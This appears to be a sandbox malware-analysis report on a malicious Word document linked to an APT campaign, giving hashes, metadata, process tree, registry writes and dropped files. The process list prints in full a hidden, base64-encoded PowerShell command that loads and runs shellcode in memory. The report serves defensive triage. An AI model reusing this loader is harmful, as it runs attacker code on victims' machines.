Field | Value |
---|---|
File name: | MagicHoundAPT34.doc |
Full analysis: | https://app.any.run/tasks/d20920af-e181-4121-b7f3-3f839aeb1ddb |
Verdict: | Malicious activity |
Analysis date: | April 24, 2019, 07:18:23 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Windows User, Template: Normal, Last Saved By: Windows User, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Total Editing Time: 02:00, Create Time/Date: Sun Sep 9 10:44:00 2018, Last Saved Time/Date: Sun Sep 9 10:46:00 2018, Number of Pages: 1, Number of Words: 8, Number of Characters: 47, Security: 0 |
MD5: | 10D12A4363A4CA5CB369EDD4D6DF108E |
SHA1: | 9FF035E1D7517AC3C081A1A25382FA862DD1F87D |
SHA256: | DB53B4157868FFFD0331C1498E2209C11499B14F5AA980FE4FB3453858ED90B5 |
SSDEEP: | 384:wZ8iSUR/8dfErqrbjVSrnQqDhyPuhyWq6r2XhMkfSYwUG2MM2mBS0jUMtPPp:C/qSsbJSzB1SoyWqlRMkHw/M2DTMB |
Extension | Identification |
---|---|
.doc | Microsoft Word document (54.2) |
.doc | Microsoft Word document (old ver.) (32.2) |
Field | Value |
---|---|
CompObjUserType: | Microsoft Word 97-2003 Document |
CompObjUserTypeLen: | 32 |
HeadingPairs: | |
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 15 |
CharCountWithSpaces: | 54 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 47 |
Words: | 8 |
Pages: | 1 |
ModifyDate: | 2018:09:09 09:46:00 |
CreateDate: | 2018:09:09 09:44:00 |
TotalEditTime: | 2.0 minutes |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | Windows User |
Template: | Normal |
Comments: | - |
Keywords: | - |
Author: | Windows User |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2320 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\MagicHoundAPT34.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1184 | powershell.exe -window hidden -e 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 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1920 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABCAG0AdAAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAEIAbQB0ACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAYQAsADAAeABmADcALAAwAHgAYwA2ACwAMAB4ADQAZQAsADAAeAAwADMALAAwAHgAZAA5ACwAMAB4AGUAYgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADMAMQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQANwAsADAAeAAzADEALAAwAHgANQAwACwAMAB4ADEAMwAsADAAeAAwADMALAAwAHgANQAwACwAMAB4ADEAMwAsADAAeAA4ADMALAAwAHgAZQA4ACwAMAB4ADAAYgAsADAAeAAyADQALAAwAHgAYgBiACwAMAB4AGYAZgAsADAAeAAxAGIALAAwAHgAMgBiACwAMAB4ADQANAAsADAAeAAwADAALAAwAHgAZABiACwAMAB4ADQAYwAsADAAeABjAGMALA
AwAHgAZQA1ACwAMAB4AGUAYQAsADAAeAA0AGMALAAwAHgAYQBhACwAMAB4ADYAZQAsADAAeAA1AGMALAAwAHgANwBkACwAMAB4AGIAOAAsADAAeAAyADMALAAwAHgANQAwACwAMAB4AGYANgAsADAAeABlAGMALAAwAHgAZAA3ACwAMAB4AGUAMwAsADAAeAA3AGEALAAwAHgAMwA5ACwAMAB4AGQANwAsADAAeAA0ADQALAAwAHgAMwAwACwAMAB4ADEAZgAsADAAeABkADYALAAwAHgANQA1ACwAMAB4ADYAOQAsADAAeAA2ADMALAAwAHgANwA5ACwAMAB4AGQANQAsADAAeAA3ADAALAAwAHgAYgAwACwAMAB4ADUAOQAsADAAeABlADQALAAwAHgAYgBhACwAMAB4AGMANQAsADAAeAA5ADgALAAwAHgAMgAxACwAMAB4AGEANgAsADAAeAAyADQALAAwAHgAYwA4ACwAMAB4AGYAYQAsADAAeABhAGMALAAwAHgAOQBiACwAMAB4AGYAZAAsADAAeAA4AGYALAAwAHgAZgA5ACwAMAB4ADIANwAsADAAeAA3ADUALAAwAHgAYwAzACwAMAB4AGUAYwAsADAAeAAyAGYALAAwAHgANgBhACwAMAB4ADkAMwAsADAAeAAwAGYALAAwAHgAMAAxACwAMAB4ADMAZAAsADAAeABhADgALAAwAHgANAA5ACwAMAB4ADgAMQAsADAAeABiAGYALAAwAHgANwBkACwAMAB4AGUAMgAsADAAeAA4ADgALAAwAHgAYQA3ACwAMAB4ADYAMgAsADAAeABjAGYALAAwAHgANAAzACwAMAB4ADUAMwAsADAAeAA1ADAALAAwAHgAYgBiACwAMAB4ADUANQAsADAAeABiADUALAAwAHgAYQA5ACwAMAB4ADQANAAsADAAeABmADkALAAwAHgAZgA4ACwAMAB4ADAANgAsADAAeABiADcALAAwAHgAMAAzACwAMAB4ADMAYwAsADAAeABhADAALAAwAHgAMgA4ACwAMAB4ADcANgAsADAAeAAzADQALAAwAHgAZAAzACwAMAB4AGQANQAsADAAeAA4ADEALAAwAHgAOAAzACwAMAB4AGEAZQAsADAAeAAwADEALAAwAHgAMAA3ACwAMAB4ADEAMAAsADAAeAAwADgALAAwAHgAYwAxACwAMAB4AGIAZgAsADAAeABmAGMALAAwAHgAYQA5ACwAMAB4ADAANgAsADAAeAA1ADkALAAwAHgANwA2ACwAMAB4AGEANQAsADAAeABlADMALAAwAHgAMgBkACwAMAB4AGQAMAAsADAAeABhADkALAAwAHgAZgAyACwAMAB4AGUAMgAsADAAeAA2AGEALAAwAHgAZAA1ACwAMAB4ADcAZgAsADAAeAAwADUALAAwAHgAYgBkACwAMAB4ADUAYwAsADAAeAAzAGIALAAwAHgAMgAyACwAMAB4ADEAOQAsADAAeAAwADUALAAwAHgAOQBmACwAMAB4ADQAYgAsADAAeAAzADgALAAwAHgAZQAzACwAMAB4ADQAZQAsADAAeAA3ADMALAAwAHgANQBhACwAMAB4ADQAYwAsADAAeAAyAGUALAAwAHgAZAAxACwAMAB4ADEAMAAsADAAeAA2ADAALAAwAHgAMwBiACwAMAB4ADYAOAAsADAAeAA3AGIALAAwAHgAZQBjACwAMAB4ADgAOAAsADAAeAA0ADEALAAwAHgAOAA0ACwAMAB4AGUAYwAsADAAeAA4ADYALAAwAHgAZAAyACwAMAB4AGYANwAsADAAeABkAGUALAAwAHgAMAA5ACwAMAB4ADQAOQAsADAAeAA5ADAALAAwAHgANQAyACwAMAB4AGMAMQAsADAAeAA1ADcALAAwAHgANgA3ACwAMAB4ADkANQAsADAAeABmADgALAAwAHgAMgAwACwAMAB4AGYANwAsADAAeAA2ADgALA
AwAHgAMAAzACwAMAB4ADUAMQAsADAAeABkADEALAAwAHgAYQBlACwAMAB4ADUANwAsADAAeAAwADEALAAwAHgANAA5ACwAMAB4ADAANwAsADAAeABkADgALAAwAHgAYwBhACwAMAB4ADgAOQAsADAAeABhADgALAAwAHgAMABkACwAMAB4ADYANgAsADAAeAA4AGYALAAwAHgAMwBlACwAMAB4ADYAZQAsADAAeABkAGYALAAwAHgAOAA1ACwAMAB4AGEAYwAsADAAeAAwADYALAAwAHgAMgAyACwAMAB4ADkAYQAsADAAeABjADUALAAwAHgANgA1ACwAMAB4AGEAYgAsADAAeAA3AGMALAAwAHgAYgA1ACwAMAB4AGQAOQAsADAAeABmAGMALAAwAHgAZAAwACwAMAB4ADcANQAsADAAeAA4AGEALAAwAHgAYgBjACwAMAB4ADgAMAAsADAAeAAxAGQALAAwAHgAYwAwACwAMAB4ADMAMgAsADAAeABmAGUALAAwAHgAMwBkACwAMAB4AGUAYgAsADAAeAA5ADgALAAwAHgAOQA3ACwAMAB4AGQANwAsADAAeAAwADQALAAwAHgANwA1ACwAMAB4AGMAZgAsADAAeAA0AGYALAAwAHgAYgBjACwAMAB4AGQAYwAsADAAeAA5AGIALAAwAHgAZQBlACwAMAB4ADQAMQAsADAAeABjAGIALAAwAHgAZQAxACwAMAB4ADMAMAAsADAAeABjADkALAAwAHgAZgA4ACwAMAB4ADEANgAsADAAeABmAGUALAAwAHgAMwBhACwAMAB4ADcANAAsADAAeAAwADUALAAwAHgAOQA2ACwAMAB4AGMAYQAsADAAeABjADMALAAwAHgANwA3ACwAMAB4ADMAMAAsADAAeABkADQALAAwAHgAZgA5ACwAMAB4ADEAMgAsADAAeABiAGMALAAwAHgANAAwACwAMAB4ADAANgAsADAAeABiADUALAAwAHgAZQBiACwAMAB4AGYAYwAsADAAeAAwADQALAAwAHgAZQAwACwAMAB4AGQAYgAsADAAeABhADIALAAwAHgAZgA3ACwAMAB4AGMANwAsADAAeAA1ADAALAAwAHgANgBhACwAMAB4ADYAMgAsADAAeABhADgALAAwAHgAMABlACwAMAB4ADkAMwAsADAAeAA2ADIALAAwAHgAMgA4ACwAMAB4AGMAZQAsADAAeABjADUALAAwAHgAZQA4ACwAMAB4ADIAOAAsADAAeABhADYALAAwAHgAYgAxACwAMAB4ADQAOAAsADAAeAA3AGIALAAwAHgAZAAzACwAMAB4AGIAZAAsADAAeAA0ADQALAAwAHgAZQBmACwAMAB4ADQAOAAsADAAeAAyADgALAAwAHgANgA3ACwAMAB4ADQANgAsADAAeAAzAGQALAAwAHgAZgBiACwAMAB4ADAAZgAsADAAeAA2ADQALAAwAHgAMQA4ACwAMAB4AGMAYgAsADAAeAA4AGYALAAwAHgAOQA3ACwAMAB4ADQAZgAsADAAeABjAGQALAAwAHgAZQBjACwAMAB4ADQAMQAsADAAeABhADkALAAwAHgAYgBiACwAMAB4ADEAYwAsADAAeAA1ADIAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEMAdwBoAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOg
A6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABDAHcAaAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAQwB3AGgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1692 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\jfwya5zq.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
2160 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES3A29.tmp" "c:\Users\admin\AppData\Local\Temp\CSC3A28.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) | ||||
PID | Process | Operation | Key | Name | Value |
---|---|---|---|---|---|
2320 | WINWORD.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems | s)3 | 7329330010090000010000000000000000000000 |
2320 | WINWORD.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | 1033 | Off |
2320 | WINWORD.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | 1033 | On |
2320 | WINWORD.EXE | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | WORDFiles | 1318584350 |
2320 | WINWORD.EXE | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | ProductFiles | 1318584464 |
2320 | WINWORD.EXE | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | ProductFiles | 1318584465 |
2320 | WINWORD.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word | MTTT | 100900004E2C24F06DFAD40100000000 |
2320 | WINWORD.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems | j+3 | 6A2B33001009000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 |
2320 | WINWORD.EXE | delete value | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems | j+3 | 6A2B33001009000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 |
2320 | WINWORD.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | 0 |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2320 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR2DF3.tmp.cvr | — | — | — |
1184 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\91U0G2ZO022UMOH09LYR.temp | — | — | — |
1920 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WF3UQDBDSVLNK4AOM01Z.temp | — | — | — |
1920 | powershell.exe | C:\Users\admin\AppData\Local\Temp\jfwya5zq.0.cs | — | — | — |
1920 | powershell.exe | C:\Users\admin\AppData\Local\Temp\jfwya5zq.cmdline | — | — | — |
1692 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSC3A28.tmp | — | — | — |
1692 | csc.exe | C:\Users\admin\AppData\Local\Temp\jfwya5zq.pdb | — | — | — |
2160 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RES3A29.tmp | — | — | — |
1692 | csc.exe | C:\Users\admin\AppData\Local\Temp\jfwya5zq.dll | — | — | — |
1692 | csc.exe | C:\Users\admin\AppData\Local\Temp\jfwya5zq.out | — | — | — |
Process | Message |
---|---|
csc.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |